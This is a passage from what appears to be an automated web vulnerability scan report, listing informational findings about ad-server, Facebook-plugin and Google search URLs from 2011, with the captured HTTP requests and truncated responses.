P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyMDIwMzSzMACx5Mjgw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Wed, 01-Sep-2021 01:20:48 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 4565

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_blank">
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...
</title>

<link rel="stylesheet" href="http://static.mcclatchyinteractive.com/static/styles/mi/third_party/yahoo/yahoo.css" type="text/css">
<style type="text/css">
...[SNIP]...
<div style="overflow:hidden; height:14px;"><a href="http://info.yahoo.com/services/us/yahoo/ads/details.html" target="_blank" class="title">Ads by Yahoo!</a>
...[SNIP]...

20.15. http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gannett.gcion.com
Path:	/addyn/3.0/5111.1/778079/0/-1/ADTECH

Issue detail

The page was loaded from a URL containing a query string:

http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH;alias=content.usatoday.com/communities/campusrivalry_Bottom728x90;cookie=info;loc=100;target=_blank;grp=38840;misc=1315096975888;noperf=1;size=728x90;key=Blog+Stay+updated+Oregon-LSU+other+college+football+action;kvtitle=Blog-Stay-updated-on-Oregon-LSU-and-other-college-football-action

The response contains the following link to another domain:

http://optimized-by.rubiconproject.com/a/4462/5032/'+rubSect+'-2.html

Request

GET /addyn/3.0/5111.1/778079/0/-1/ADTECH;alias=content.usatoday.com/communities/campusrivalry_Bottom728x90;cookie=info;loc=100;target=_blank;grp=38840;misc=1315096975888;noperf=1;size=728x90;key=Blog+Stay+updated+Oregon-LSU+other+college+football+action;kvtitle=Blog-Stay-updated-on-Oregon-LSU-and-other-college-football-action HTTP/1.1
Host: gannett.gcion.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4E62BFAA6E651A4418BD90FFF0005EB9; rsi_segs=

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 941

rubSect = "";
if (window.location.pathname.indexOf("life") != -1) rubSect = 7103;
else if (window.location.pathname.indexOf("auto") != -1) rubSect = 7208;
else if (window.location.pathname.indexOf("mo
...[SNIP]...
ubSect = 7106;
else if (window.location.pathname.indexOf("tech") != -1) rubSect = 7107;
else if (window.location.pathname.indexOf("weather") != -1) rubSect = 7108;
else rubSect = 7102;
document.write('<IFRAME SRC="http://optimized-by.rubiconproject.com/a/4462/5032/'+rubSect+'-2.html" FRAMEBORDER="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="NO" WIDTH="728" HEIGHT="90"></IFRAME>
...[SNIP]...

20.16. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-9055644179108667&output=html&h=125&slotname=6753566882&w=130&lmt=1315115078&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F03%2Fus-weather-football-idUSTRE78222D20110903&dt=1315097078745&shv=r20110824&jsv=r20110719&saldr=1&correlator=1315097078791&frm=7&adk=1459060001&ga_vid=1850965108.1315097079&ga_sid=1315097079&ga_hid=81835406&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&biw=1217&bih=1037&ifk=4291066834&fu=4&ifi=1&dtd=50

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903%26hl%3Den%26client%3Dca-pub-9055644179108667%26adU%3DGoDaddy.com/SSL%26adT%3D%252412.99%2BGoDaddy%2BSSL%2BSave%26gl%3DUS&usg=AFQjCNE5R0GVl60AbarOa8Q4B606oaUEAA

Request

GET /pagead/ads?client=ca-pub-9055644179108667&output=html&h=125&slotname=6753566882&w=130&lmt=1315115078&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.reuters.com%2Farticle%2F2011%2F09%2F03%2Fus-weather-football-idUSTRE78222D20110903&dt=1315097078745&shv=r20110824&jsv=r20110719&saldr=1&correlator=1315097078791&frm=7&adk=1459060001&ga_vid=1850965108.1315097079&ga_sid=1315097079&ga_hid=81835406&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&biw=1217&bih=1037&ifk=4291066834&fu=4&ifi=1&dtd=50 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 04 Sep 2011 00:44:01 GMT
Server: cafe
Cache-Control: private
Content-Length: 4506
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903%26hl%3Den%26client%3Dca-pub-9055644179108667%26adU%3DGoDaddy.com/SSL%26adT%3D%252412.99%2BGoDaddy%2BSSL%2BSave%26gl%3DUS&usg=AFQjCNE5R0GVl60AbarOa8Q4B606oaUEAA" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...

20.17. http://imp.fetchback.com/serve/fb/imp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/serve/fb/imp

Issue detail

The page was loaded from a URL containing a query string:

http://imp.fetchback.com/serve/fb/imp?tid=68283&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/6291/9346/15214-2.3214995.3237976?url=

The response contains the following link to another domain:

http://get.adobe.com/flashplayer/

Request

Response

20.18. http://pixel.invitemedia.com/admeld_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/admeld_sync

Issue detail

The page was loaded from a URL containing a query string:

http://pixel.invitemedia.com/admeld_sync?admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match

The response contains the following link to another domain:

http://tag.admeld.com/match?admeld_adprovider_id=300&external_user_id=e1c22076-53f3-4fd9-8356-2735bf06a66c&Expiration=1315530305&custom_user_segments=%2C17329%2C27165

Request

GET /admeld_sync?admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=e1c22076-53f3-4fd9-8356-2735bf06a66c; segments_p1="eJzjYuHY2M7IxcIx9wojAA9oAtg="; exchange_uid="eyI0IjogWyJDQUVTRVB4NVdCa2dwbTVNQ3pVRHd2TlVDNXciLCA3MzQzODNdfQ=="; partnerUID="eyIxNjkiOiBbIjRlNWUzZjFhZTNmZDc0MjciLCB0cnVlXX0="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sun, 04 Sep 2011 01:05:05 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Sun, 04-Sep-2011 01:04:45 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 219

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=300&external_user_id=e1c22076-53f3-4fd9-8356-2735bf06a66c&Expiration=1315530305&custom_user_segments=%2C17329%2C27165"/>');

20.19. http://rtq.careerbuilder.com/RTQ/jobstream.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rtq.careerbuilder.com
Path:	/RTQ/jobstream.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://rtq.careerbuilder.com/RTQ/jobstream.aspx?lr=CBMC_SB&rssid=MC_SB_jbstrm&num=&kw=CustomField3:SACBEETJ&cat=All&rad=50&state=&city=&zip=&ddtitle=false&ddcompany=false&sb=[&%20mi_cb_search_box%20&]

The response contains the following link to another domain:

http://img.icbdr.com/images/plink/logos/CB.com_websafe_2-color_thumb.gif

Request

GET /RTQ/jobstream.aspx?lr=CBMC_SB&rssid=MC_SB_jbstrm&num=&kw=CustomField3:SACBEETJ&cat=All&rad=50&state=&city=&zip=&ddtitle=false&ddcompany=false&sb=[&%20mi_cb_search_box%20&] HTTP/1.1
Host: rtq.careerbuilder.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEAR35
Date: Sun, 04 Sep 2011 00:44:05 GMT
Connection: close
Content-Length: 6162

// declaration
var cb_jobstream_title;
var cb_jobstream_title_bg
var cb_jobstream_title_font
var cb_jobstream_border;
var cb_jobstream_width;
var cb_jobstream_height;
var cb_jobstream_main_bgco
...[SNIP]...
<div id="jobstream" style="'+cb__wth+'">');
document.write('<img src="http://img.icbdr.com/images/plink/logos/CB.com_websafe_2-color_thumb.gif" /><br />
...[SNIP]...

20.20. http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tap2-cdn.rubiconproject.com
Path:	/partner/scripts/rubicon/emily.html

Issue detail

The page was loaded from a URL containing a query string:

http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=6291/9346

The response contains the following link to another domain:

http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif

Request

GET /partner/scripts/rubicon/emily.html?rtb_ext=1&pc=6291/9346 HTTP/1.1
Host: tap2-cdn.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; rpb=7908%3D1%264940%3D1%265364%3D1; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses15=5032^1; rdk=6291/9346; rdk2=0; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051

Response

HTTP/1.1 200 OK
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Last-Modified: Sat, 03 Sep 2011 05:07:44 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=600
Expires: Sun, 04 Sep 2011 01:11:34 GMT
Date: Sun, 04 Sep 2011 01:01:34 GMT
Content-Length: 9192
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">



<html>
<head>
<title></title>
</head>
<
...[SNIP]...
</script>
<img src="http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>

</body>
...[SNIP]...

20.21. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/likebox.php?api_key=5597051e9d2034b294865dbb43c47ee0&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dffe70414%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=0&header=true&height=62&href=http%3A%2F%2Fwww.facebook.com%2Fthecharlotteobserver&locale=en_US&sdk=joey&show_faces=false&stream=false&width=290

The response contains the following links to other domains:

http://profile.ak.fbcdn.net/hprofile-ak-snc4/203512_42580340317_3245881_q.jpg
http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js
http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/vneZ6lOGBMV.js
http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/te2emPSgfVn.css
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/0V1g9eV4kVC.css
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/HR2ezcCYeTR.css
http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/fXOlnGV2onC.js
http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js
http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/xxErGdwd-7F.css

Request

Response

20.22. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/plugins/recommendations.php?api_key=5597051e9d2034b294865dbb43c47ee0&font=arial&height=300&locale=en_US&sdk=joey&site=www.charlotteobserver.com&width=290

The response contains the following links to other domains:

http://external.ak.fbcdn.net/safe_image.php?d=AQApA4nIHITlt2Qx&url=http%3A%2F%2Fmedia.charlotteobserver.com%2Fsmedia%2F2011%2F05%2F26%2F20%2F9H7A7DJ_Tara_Servatiu_BZ_12.embedded.prod_affiliate.138.jpg
http://external.ak.fbcdn.net/safe_image.php?d=AQBcR6QYJsVCt4y0&url=http%3A%2F%2Fmedia.charlotteobserver.com%2Fsmedia%2F2011%2F07%2F12%2F16%2F53%2F196-1fVPWN.Em.55.jpg
http://www.charlotteobserver.com/2011/05/27/2329617/servatius-wbt-am-part-ways.html
http://www.charlotteobserver.com/2011/05/27/2330268/wbt-terminates-tara-servatius.html
http://www.charlotteobserver.com/2011/07/12/2449054/police-ca-woman-cut-off-husbands.html

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.15.49
X-Cnection: close
Date: Sun, 04 Sep 2011 01:11:09 GMT
Content-Length: 21035

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Facebook</title><style>body{background:#fff;font-size: 11px;font-f
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_4897caf8c883bccf"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="Man's penis cut off, put through garbage disposal | CharlotteObserver.com & The Charlotte Observer N" href="http://www.charlotteobserver.com/2011/07/12/2449054/police-ca-woman-cut-off-husbands.html" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQBcR6QYJsVCt4y0&url=http%3A%2F%2Fmedia.charlotteobserver.com%2Fsmedia%2F2011%2F07%2F12%2F16%2F53%2F196-1fVPWN.Em.55.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.charlotteobserver.com/2011/07/12/2449054/police-ca-woman-cut-off-husbands.html" target="_blank">Man's penis cut off, put through garbage disposal | CharlotteObserver.com & The Charlotte Observer N</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_1c19143ccfb743a"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="WBT terminates Tara Servatius | CharlotteObserver.com & The Charlotte Observer Newspaper" href="http://www.charlotteobserver.com/2011/05/27/2330268/wbt-terminates-tara-servatius.html" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQApA4nIHITlt2Qx&url=http%3A%2F%2Fmedia.charlotteobserver.com%2Fsmedia%2F2011%2F05%2F26%2F20%2F9H7A7DJ_Tara_Servatiu_BZ_12.embedded.prod_affiliate.138.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.charlotteobserver.com/2011/05/27/2330268/wbt-terminates-tara-servatius.html" target="_blank">WBT terminates Tara Servatius | CharlotteObserver.com & The Charlotte Observer Newspaper</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_6ec34df0e64057e4"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" title="WBT-AM fires Tara Servatius | CharlotteObserver.com & The Charlotte Observer Newspaper" href="http://www.charlotteobserver.com/2011/05/27/2329617/servatius-wbt-am-part-ways.html#storylink=omni_popular" target="_blank"><img class="img" src="http://external.ak.fbcdn.net/safe_image.php?d=AQApA4nIHITlt2Qx&url=http%3A%2F%2Fmedia.charlotteobserver.com%2Fsmedia%2F2011%2F05%2F26%2F20%2F9H7A7DJ_Tara_Servatiu_BZ_12.embedded.prod_affiliate.138.jpg" alt="" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://www.charlotteobserver.com/2011/05/27/2329617/servatius-wbt-am-part-ways.html#storylink=omni_popular" target="_blank">WBT-AM fires Tara Servatius | CharlotteObserver.com & The Charlotte Observer Newspaper</a>
...[SNIP]...

20.23. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=google+trend+top+search

The response contains the following links to other domains:

http://antezeta.com/news/top-keyword-search-trends
http://en.wikipedia.org/wiki/Google_Trends
http://top10googletrends.com/
http://webcache.googleusercontent.com/search?q=cache:1kIIJuYu8_oJ:www.bayareasearchengineacademy.org/blog/%3Fp%3D9+google+trend+top+search&cd=8&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:6AfPomsYIwQJ:www.pandia.com/sew/246-google-trends.html+google+trend+top+search&cd=9&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:GEiTu6XRlFkJ:top10googletrends.com/+google+trend+top+search&cd=10&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:MC-aI-QqmRAJ:www.google.com/trends+google+trend+top+search&cd=1&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:VGZMnyjc6JwJ:antezeta.com/news/top-keyword-search-trends+google+trend+top+search&cd=6&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:aNjnosO20ssJ:www.google.com/intl/en/press/zeitgeist/index.html+google+trend+top+search&cd=4&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:ilC_ouuUnAgJ:en.wikipedia.org/wiki/Google_Trends+google+trend+top+search&cd=5&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:omyin9RPpAoJ:www.google.com/insights/search/+google+trend+top+search&cd=3&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:uvKavSff1xUJ:www.google.com/trends/hottrends+google+trend+top+search&cd=2&hl=en&ct=clnk&gl=us
http://webcache.googleusercontent.com/search?q=cache:v2G51Y-L1jwJ:www.mibazaar.com/googletrends.html+google+trend+top+search&cd=7&hl=en&ct=clnk&gl=us
http://www.bayareasearchengineacademy.org/blog/?p=9
http://www.mibazaar.com/googletrends.html
http://www.pandia.com/sew/246-google-trends.html
http://www.youtube.com/results?q=google+trend+top+search&um=1&ie=UTF-8&sa=N&hl=en&tab=w1

Request

GET /search?sourceid=chrome&ie=UTF-8&q=google+trend+top+search HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=weQTGvlcDANTxV5wF-7ErWL28T_eIde2eHArK6Ro0Zy54tkidlIV7dmvnTL0c6xSXtweleFZDrG22uhTYX0LPoqeazjheLUerXqIXctalXVtgPQlJij9RupAr8rvIdFS

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:40:55 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/StnTz5pY.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 97988

<!doctype html> <head> <title>google trend top search - Google Search</title> <script>window.google={kEI:"F8liTrXhN8vUiAKRuNDFCg",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAttr
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 href="http://www.youtube.com/results?q=google+trend+top+search&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick="gbar.logger.il(1,{t:36})">YouTube</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:MC-aI-QqmRAJ:www.google.com/trends+google+trend+top+search&cd=1&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','1','','0CB0QIDAA')">Cached</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:uvKavSff1xUJ:www.google.com/trends/hottrends+google+trend+top+search&cd=2&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','2','','0CCgQIDAB')">Cached</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:omyin9RPpAoJ:www.google.com/insights/search/+google+trend+top+search&cd=3&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','3','','0CC8QIDAC')">Cached</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:aNjnosO20ssJ:www.google.com/intl/en/press/zeitgeist/index.html+google+trend+top+search&cd=4&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','4','','0CDYQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Google_Trends" class=l onmousedown="return clk(this,this.href,'','','','5','','0CD0QFjAE')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:ilC_ouuUnAgJ:en.wikipedia.org/wiki/Google_Trends+google+trend+top+search&cd=5&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','5','','0CD8QIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://antezeta.com/news/top-keyword-search-trends" class=l onmousedown="return clk(this,this.href,'','','','6','','0CEQQFjAF')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:VGZMnyjc6JwJ:antezeta.com/news/top-keyword-search-trends+google+trend+top+search&cd=6&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','6','','0CEYQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.mibazaar.com/googletrends.html" class=l onmousedown="return clk(this,this.href,'','','','7','','0CEoQFjAG')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:v2G51Y-L1jwJ:www.mibazaar.com/googletrends.html+google+trend+top+search&cd=7&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','7','','0CEwQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.bayareasearchengineacademy.org/blog/?p=9" class=l onmousedown="return clk(this,this.href,'','','','8','','0CFEQFjAH')">100 <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:1kIIJuYu8_oJ:www.bayareasearchengineacademy.org/blog/%3Fp%3D9+google+trend+top+search&cd=8&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,'http://webcache.googleusercontent.com/search?q=cache:1kIIJuYu8_oJ:www.bayareasearchengineacademy.org/blog/%3Fp%3D9+google+trend+top+search&cd=8&hl=en&ct=clnk&gl=us','','','','8','','0CFMQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.pandia.com/sew/246-google-trends.html" class=l onmousedown="return clk(this,this.href,'','','','9','','0CFgQFjAI')">Using <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:6AfPomsYIwQJ:www.pandia.com/sew/246-google-trends.html+google+trend+top+search&cd=9&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','9','','0CFoQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://top10googletrends.com/" class=l onmousedown="return clk(this,this.href,'','','','10','','0CF8QFjAJ')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:GEiTu6XRlFkJ:top10googletrends.com/+google+trend+top+search&cd=10&hl=en&ct=clnk&gl=us" onmousedown="return clk(this,this.href,'','','','10','','0CGEQIDAJ')">Cached</a>
...[SNIP]...

20.24. http://www.google.com/trends/hottrends previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/trends/hottrends

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/trends/hottrends?q=longhorn+network&date=2011-9-3&sa=X

The response contains the following links to other domains:

http://suddenlinkfyi.com/
http://suddenlinkfyi.com/2011/09/02/longhorn-network/
http://www.burntorangenation.com/
http://www.burntorangenation.com/2011/9/2/2401449/kansas-texas-to-air-on-longhorn-network
http://www.businessinsider.com/
